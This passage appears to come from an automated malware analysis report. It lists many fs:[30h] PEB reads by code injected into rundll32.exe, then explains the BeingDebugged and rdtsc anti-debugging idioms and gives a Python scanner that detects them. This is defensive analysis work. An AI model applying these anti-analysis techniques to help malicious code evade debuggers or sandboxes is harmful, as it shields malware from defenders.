          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0463AD30 mov eax, dword ptr fs:[00000030h]14_2_0463AD30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046FE539 mov eax, dword ptr fs:[00000030h]14_2_046FE539
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046BA537 mov eax, dword ptr fs:[00000030h]14_2_046BA537
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04664D3B mov eax, dword ptr fs:[00000030h]14_2_04664D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04664D3B mov eax, dword ptr fs:[00000030h]14_2_04664D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04664D3B mov eax, dword ptr fs:[00000030h]14_2_04664D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0464D5E0 mov eax, dword ptr fs:[00000030h]14_2_0464D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0464D5E0 mov eax, dword ptr fs:[00000030h]14_2_0464D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046FFDE2 mov eax, dword ptr fs:[00000030h]14_2_046FFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046FFDE2 mov eax, dword ptr fs:[00000030h]14_2_046FFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046FFDE2 mov eax, dword ptr fs:[00000030h]14_2_046FFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046FFDE2 mov eax, dword ptr fs:[00000030h]14_2_046FFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046E8DF1 mov eax, dword ptr fs:[00000030h]14_2_046E8DF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6DC9 mov eax, dword ptr fs:[00000030h]14_2_046B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6DC9 mov eax, dword ptr fs:[00000030h]14_2_046B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6DC9 mov eax, dword ptr fs:[00000030h]14_2_046B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6DC9 mov ecx, dword ptr fs:[00000030h]14_2_046B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6DC9 mov eax, dword ptr fs:[00000030h]14_2_046B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6DC9 mov eax, dword ptr fs:[00000030h]14_2_046B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046635A1 mov eax, dword ptr fs:[00000030h]14_2_046635A1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04661DB5 mov eax, dword ptr fs:[00000030h]14_2_04661DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04661DB5 mov eax, dword ptr fs:[00000030h]14_2_04661DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04661DB5 mov eax, dword ptr fs:[00000030h]14_2_04661DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_047005AC mov eax, dword ptr fs:[00000030h]14_2_047005AC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_047005AC mov eax, dword ptr fs:[00000030h]14_2_047005AC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04662581 mov eax, dword ptr fs:[00000030h]14_2_04662581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04662581 mov eax, dword ptr fs:[00000030h]14_2_04662581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04662581 mov eax, dword ptr fs:[00000030h]14_2_04662581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04662581 mov eax, dword ptr fs:[00000030h]14_2_04662581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04632D8A mov eax, dword ptr fs:[00000030h]14_2_04632D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04632D8A mov eax, dword ptr fs:[00000030h]14_2_04632D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04632D8A mov eax, dword ptr fs:[00000030h]14_2_04632D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04632D8A mov eax, dword ptr fs:[00000030h]14_2_04632D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04632D8A mov eax, dword ptr fs:[00000030h]14_2_04632D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466FD9B mov eax, dword ptr fs:[00000030h]14_2_0466FD9B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466FD9B mov eax, dword ptr fs:[00000030h]14_2_0466FD9B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0464766D mov eax, dword ptr fs:[00000030h]14_2_0464766D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465AE73 mov eax, dword ptr fs:[00000030h]14_2_0465AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465AE73 mov eax, dword ptr fs:[00000030h]14_2_0465AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465AE73 mov eax, dword ptr fs:[00000030h]14_2_0465AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465AE73 mov eax, dword ptr fs:[00000030h]14_2_0465AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465AE73 mov eax, dword ptr fs:[00000030h]14_2_0465AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046FAE44 mov eax, dword ptr fs:[00000030h]14_2_046FAE44
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046FAE44 mov eax, dword ptr fs:[00000030h]14_2_046FAE44
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0463E620 mov eax, dword ptr fs:[00000030h]14_2_0463E620
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046EFE3F mov eax, dword ptr fs:[00000030h]14_2_046EFE3F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0463C600 mov eax, dword ptr fs:[00000030h]14_2_0463C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0463C600 mov eax, dword ptr fs:[00000030h]14_2_0463C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0463C600 mov eax, dword ptr fs:[00000030h]14_2_0463C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04668E00 mov eax, dword ptr fs:[00000030h]14_2_04668E00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1608 mov eax, dword ptr fs:[00000030h]14_2_046F1608
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466A61C mov eax, dword ptr fs:[00000030h]14_2_0466A61C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466A61C mov eax, dword ptr fs:[00000030h]14_2_0466A61C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046616E0 mov ecx, dword ptr fs:[00000030h]14_2_046616E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046476E2 mov eax, dword ptr fs:[00000030h]14_2_046476E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04678EC7 mov eax, dword ptr fs:[00000030h]14_2_04678EC7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04708ED6 mov eax, dword ptr fs:[00000030h]14_2_04708ED6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046636CC mov eax, dword ptr fs:[00000030h]14_2_046636CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046EFEC0 mov eax, dword ptr fs:[00000030h]14_2_046EFEC0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B46A7 mov eax, dword ptr fs:[00000030h]14_2_046B46A7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04700EA5 mov eax, dword ptr fs:[00000030h]14_2_04700EA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04700EA5 mov eax, dword ptr fs:[00000030h]14_2_04700EA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04700EA5 mov eax, dword ptr fs:[00000030h]14_2_04700EA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046CFE87 mov eax, dword ptr fs:[00000030h]14_2_046CFE87
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0464FF60 mov eax, dword ptr fs:[00000030h]14_2_0464FF60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04708F6A mov eax, dword ptr fs:[00000030h]14_2_04708F6A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0464EF40 mov eax, dword ptr fs:[00000030h]14_2_0464EF40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04634F2E mov eax, dword ptr fs:[00000030h]14_2_04634F2E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04634F2E mov eax, dword ptr fs:[00000030h]14_2_04634F2E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466E730 mov eax, dword ptr fs:[00000030h]14_2_0466E730
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466A70E mov eax, dword ptr fs:[00000030h]14_2_0466A70E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466A70E mov eax, dword ptr fs:[00000030h]14_2_0466A70E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465F716 mov eax, dword ptr fs:[00000030h]14_2_0465F716
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046CFF10 mov eax, dword ptr fs:[00000030h]14_2_046CFF10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046CFF10 mov eax, dword ptr fs:[00000030h]14_2_046CFF10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0470070D mov eax, dword ptr fs:[00000030h]14_2_0470070D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0470070D mov eax, dword ptr fs:[00000030h]14_2_0470070D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046737F5 mov eax, dword ptr fs:[00000030h]14_2_046737F5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04648794 mov eax, dword ptr fs:[00000030h]14_2_04648794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B7794 mov eax, dword ptr fs:[00000030h]14_2_046B7794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B7794 mov eax, dword ptr fs:[00000030h]14_2_046B7794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B7794 mov eax, dword ptr fs:[00000030h]14_2_046B7794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04701074 mov eax, dword ptr fs:[00000030h]14_2_04701074
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F2073 mov eax, dword ptr fs:[00000030h]14_2_046F2073
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04650050 mov eax, dword ptr fs:[00000030h]14_2_04650050
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04650050 mov eax, dword ptr fs:[00000030h]14_2_04650050
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466002D mov eax, dword ptr fs:[00000030h]14_2_0466002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466002D mov eax, dword ptr fs:[00000030h]14_2_0466002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466002D mov eax, dword ptr fs:[00000030h]
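The rdtsc entry for RFQ.exe and the long run of `mov eax, dword ptr fs:[00000030h]` entries for the code injected into rundll32.exe are the report's evidence for two anti-analysis idioms. On 32-bit Windows (including WOW64 processes such as this rundll32.exe), fs:[30h] is the TEB field that holds the PEB pointer; from there a sample reads PEB.BeingDebugged (PEB+2) for a debugger check, or walks PEB.Ldr (PEB+0Ch) to resolve APIs without an import table, which is why unpacked stages show so many of these reads. rdtsc reads the timestamp counter so that the elapsed cycles around a short code sequence can be compared against a threshold, a common debugger and hypervisor check. The following Python scanner is an added example and not code from the report or from the sample: it recognizes both instruction encodings in a raw x86 code buffer, labels the TEB offset being read, and runs over a hand-assembled byte sequence that is constructed for illustration, not bytes from RFQ.exe.

```python
"""
Byte-pattern scanner for two x86 (32-bit) anti-analysis idioms the report
lists as evidence: FS-relative reads of the PEB pointer (fs:[30h]) and the
RDTSC instruction.  Added example, not code from the report or the sample.
"""
import struct
from dataclasses import dataclass

FS_OVERRIDE = 0x64          # segment-override prefix for FS
RDTSC = b"\x0f\x31"         # rdtsc opcode
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# TEB fields commonly read through FS on 32-bit Windows (x86 / WOW64 layout).
TEB_FIELDS = {
    0x00: "NtTib.ExceptionList",       # SEH chain head
    0x18: "NtTib.Self",                # linear address of the TEB
    0x20: "ClientId.UniqueProcess",    # PID
    0x24: "ClientId.UniqueThread",     # TID
    0x30: "ProcessEnvironmentBlock",   # PEB pointer: BeingDebugged at PEB+2, Ldr at PEB+0Ch
}


@dataclass(frozen=True)
class Hit:
    offset: int      # byte offset of the instruction in the scanned buffer
    mnemonic: str    # rendered like the report ("mov eax, dword ptr fs:[00000030h]")
    note: str        # what the read or instruction is typically used for


def decode_fs_read(code: bytes, i: int):
    """Decode a 32-bit load from fs:[disp32] starting at code[i].

    Two encodings are handled:
      64 A1 <disp32>        mov eax, fs:[disp32]      (moffs32 form)
      64 8B /r <disp32>     mov r32, fs:[disp32]      (ModRM mod=00, rm=101)
    Returns (instruction_length, Hit) or None if the bytes do not match.
    """
    if code[i] != FS_OVERRIDE or i + 1 >= len(code):
        return None
    op = code[i + 1]
    if op == 0xA1 and i + 6 <= len(code):
        disp = struct.unpack_from("<I", code, i + 2)[0]
        reg, length = "eax", 6
    elif op == 0x8B and i + 7 <= len(code):
        modrm = code[i + 2]
        mod, reg_idx, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
        if mod != 0 or rm != 5:          # only the pure disp32 addressing form
            return None
        disp = struct.unpack_from("<I", code, i + 3)[0]
        reg, length = REG32[reg_idx], 7
    else:
        return None
    note = TEB_FIELDS.get(disp, "unknown TEB offset")
    return length, Hit(i, f"mov {reg}, dword ptr fs:[{disp:08X}h]", note)


def scan(code: bytes) -> list:
    """Linear scan of a code buffer; returns every fs:[...] read and rdtsc found."""
    hits, i = [], 0
    while i < len(code):
        decoded = decode_fs_read(code, i)
        if decoded:
            length, hit = decoded
            hits.append(hit)
            i += length
            continue
        if code[i:i + 2] == RDTSC:
            hits.append(Hit(i, "rdtsc", "timestamp counter read (timing / VM check)"))
            i += 2
            continue
        i += 1
    return hits


def summarize(hits: list) -> dict:
    """Counts matching the two report signatures: PEB reads and rdtsc uses."""
    return {
        "peb_reads": sum(1 for h in hits if h.note == "ProcessEnvironmentBlock"),
        "rdtsc": sum(1 for h in hits if h.mnemonic == "rdtsc"),
    }


# Constructed sample: a BeingDebugged check followed by a timing read and two
# more FS loads.  Hand-assembled for this example; not bytes from RFQ.exe.
SAMPLE = bytes.fromhex(
    "64A130000000"      # mov eax, dword ptr fs:[30h]      ; eax = PEB
    "0FB64002"          # movzx eax, byte ptr [eax+2]      ; PEB.BeingDebugged
    "85C0"              # test eax, eax
    "7502"              # jne +2
    "0F31"              # rdtsc
    "648B0D30000000"    # mov ecx, dword ptr fs:[30h]      ; ModRM form, ecx
    "648B1518000000"    # mov edx, dword ptr fs:[18h]      ; TEB self pointer
    "C3"                # ret
)

if __name__ == "__main__":
    found = scan(SAMPLE)
    for h in found:
        print(f"{h.offset:04X}  {h.mnemonic:<40} {h.note}")
    print(summarize(found))
```

The scanner is a linear byte match, not a disassembler, so a 0x64 byte inside an immediate or in data can produce a false positive; run it over the code section or an unpacked memory dump (here the injected region in process 14) rather than a whole file, and treat a high count of fs:[30h] reads together with rdtsc as a trigger for closer review, not as a verdict on its own. The DebugPort entries above are the dynamic counterpart to the BeingDebugged read: they come from NtQueryInformationProcess with the ProcessDebugPort information class, which returns a non-zero value when a debugger is attached.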